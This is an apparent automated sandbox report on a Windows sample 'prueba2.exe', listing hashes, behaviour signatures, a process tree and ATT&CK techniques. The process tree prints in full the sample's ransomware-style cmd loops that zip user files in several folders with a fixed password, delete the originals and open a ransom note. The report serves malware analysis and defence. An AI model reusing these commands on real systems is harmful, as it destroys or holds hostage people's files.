Analysis

  • max time kernel
    146s
  • max time network
    113s
  • platform
    windows10_x64
  • resource
    win10v200410
  • submitted
    28-04-2020 01:36

General

  • Target

    prueba2.exe

  • Size

    329KB

  • MD5

    9f5f9c71bb71b8e1571fc4d27721a99e

  • SHA1

    e64de07b46d896d25dc059dd774a140f109364c3

  • SHA256

    be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f

  • SHA512

    6c5f031ef96f6fb930bb57c0cc1287f2f34d21475f2710f88341f955405e9cc37143a037939d5cd8387fe80f63ef9ad3ca7b70575d75dcfbca475bda9d941c16

Score
3/10

Malware Config

Signatures

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Makes http(s) request 4 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Suspicious use of SetWindowsHookEx 35 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 116 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\prueba2.exe
    "C:\Users\Admin\AppData\Local\Temp\prueba2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
      2⤵
        PID:4088
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Are.docx.geminis3" "C:\Users\Admin\Documents\Are.docx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4044
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\BlockPop.docm.geminis3" "C:\Users\Admin\Documents\BlockPop.docm"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2624
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Files.docx.geminis3" "C:\Users\Admin\Documents\Files.docx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4092
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Opened.docx.geminis3" "C:\Users\Admin\Documents\Opened.docx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3688
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\OpenStart.doc.geminis3" "C:\Users\Admin\Documents\OpenStart.doc"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3764
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\Recently.docx.geminis3" "C:\Users\Admin\Documents\Recently.docx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3184
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\These.docx.geminis3" "C:\Users\Admin\Documents\These.docx"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3204
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\DebugNew.xlsm.geminis3" "C:\Users\Admin\Documents\DebugNew.xlsm"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3428
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\RemoveInitialize.xlsm.geminis3" "C:\Users\Admin\Documents\RemoveInitialize.xlsm"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3728
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\ResolveSplit.xls.geminis3" "C:\Users\Admin\Documents\ResolveSplit.xls"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2592
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\SearchResize.xlsb.geminis3" "C:\Users\Admin\Documents\SearchResize.xlsb"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3844
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\UpdateSearch.xlsb.geminis3" "C:\Users\Admin\Documents\UpdateSearch.xlsb"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1656
        • C:\PROGRA~1\7-ZIP\7z.exe
          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Documents\OutProtect.ppt.geminis3" "C:\Users\Admin\Documents\OutProtect.ppt"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3916
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Pictures %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
        2⤵
          PID:2280
          • C:\PROGRA~1\7-ZIP\7z.exe
            "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Pictures\JoinStop.jpg.geminis3" "C:\Users\Admin\Pictures\JoinStop.jpg"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4028
          • C:\PROGRA~1\7-ZIP\7z.exe
            "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Pictures\Wallpaper.jpg.geminis3" "C:\Users\Admin\Pictures\Wallpaper.jpg"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3900
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Downloads %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
          2⤵
            PID:3788
            • C:\PROGRA~1\7-ZIP\7z.exe
              "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\UnlockClose.jpeg.geminis3" "C:\Users\Admin\Downloads\UnlockClose.jpeg"
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3780
            • C:\PROGRA~1\7-ZIP\7z.exe
              "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\UnblockSelect.doc.geminis3" "C:\Users\Admin\Downloads\UnblockSelect.doc"
              3⤵
                PID:3752
              • C:\PROGRA~1\7-ZIP\7z.exe
                "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ApproveConfirm.xlsm.geminis3" "C:\Users\Admin\Downloads\ApproveConfirm.xlsm"
                3⤵
                  PID:4044
                • C:\PROGRA~1\7-ZIP\7z.exe
                  "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ResizeConvertTo.xls.geminis3" "C:\Users\Admin\Downloads\ResizeConvertTo.xls"
                  3⤵
                    PID:2624
                  • C:\PROGRA~1\7-ZIP\7z.exe
                    "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\InitializeSelect.pptx.geminis3" "C:\Users\Admin\Downloads\InitializeSelect.pptx"
                    3⤵
                      PID:4092
                    • C:\PROGRA~1\7-ZIP\7z.exe
                      "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ResolveReset.png.geminis3" "C:\Users\Admin\Downloads\ResolveReset.png"
                      3⤵
                        PID:3688
                      • C:\PROGRA~1\7-ZIP\7z.exe
                        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Downloads\ExportExpand.mp4.geminis3" "C:\Users\Admin\Downloads\ExportExpand.mp4"
                        3⤵
                          PID:3408
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Music %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
                        2⤵
                          PID:3308
                          • C:\PROGRA~1\7-ZIP\7z.exe
                            "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\ConfirmRequest.png.geminis3" "C:\Users\Admin\Music\ConfirmRequest.png"
                            3⤵
                              PID:3200
                            • C:\PROGRA~1\7-ZIP\7z.exe
                              "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\ConvertToWatch.png.geminis3" "C:\Users\Admin\Music\ConvertToWatch.png"
                              3⤵
                                PID:3364
                              • C:\PROGRA~1\7-ZIP\7z.exe
                                "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\SkipDisable.png.geminis3" "C:\Users\Admin\Music\SkipDisable.png"
                                3⤵
                                  PID:3324
                                • C:\PROGRA~1\7-ZIP\7z.exe
                                  "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Music\RemoveStep.rar.geminis3" "C:\Users\Admin\Music\RemoveStep.rar"
                                  3⤵
                                    PID:3400
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Videos %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
                                  2⤵
                                    PID:3184
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Desktop %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "%d.geminis3" "%d"
                                    2⤵
                                      PID:3232
                                      • C:\PROGRA~1\7-ZIP\7z.exe
                                        "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Desktop\ReceiveConnect.docx.geminis3" "C:\Users\Admin\Desktop\ReceiveConnect.docx"
                                        3⤵
                                          PID:3168
                                        • C:\PROGRA~1\7-ZIP\7z.exe
                                          "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Desktop\GetConvertFrom.png.geminis3" "C:\Users\Admin\Desktop\GetConvertFrom.png"
                                          3⤵
                                            PID:2644
                                          • C:\PROGRA~1\7-ZIP\7z.exe
                                            "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23159 "C:\Users\Admin\Desktop\InstallSync.txt.geminis3" "C:\Users\Admin\Desktop\InstallSync.txt"
                                            3⤵
                                              PID:3956
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c start README.txt
                                            2⤵
                                            • Modifies registry class
                                            PID:3964
                                            • C:\Windows\system32\NOTEPAD.EXE
                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\README.txt
                                              3⤵
                                              • Opens file in notepad (likely ransom note)
                                              • Suspicious use of FindShellTrayWindow
                                              PID:3916
                                        • C:\Windows\System32\rundll32.exe
                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                          1⤵
                                            PID:3776
                                          • C:\Windows\system32\OpenWith.exe
                                            C:\Windows\system32\OpenWith.exe -Embedding
                                            1⤵
                                            • Suspicious use of WriteProcessMemory
                                            • Suspicious use of SetWindowsHookEx
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            • Modifies registry class
                                            PID:3364
                                            • C:\Program Files\Microsoft Office\root\Office16\Winword.exe
                                              "C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Admin\Documents\BlockPop.docm.geminis3"
                                              2⤵
                                              • Suspicious behavior: AddClipboardFormatListener
                                              • Checks processor information in registry
                                              • Enumerates system info in registry
                                              • Suspicious use of SetWindowsHookEx
                                              PID:3728

                                          Network

                                          MITRE ATT&CK Matrix ATT&CK v6

                                          Discovery

                                          Query Registry

                                          2
                                          T1012

                                          System Information Discovery

                                          2
                                          T1082

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads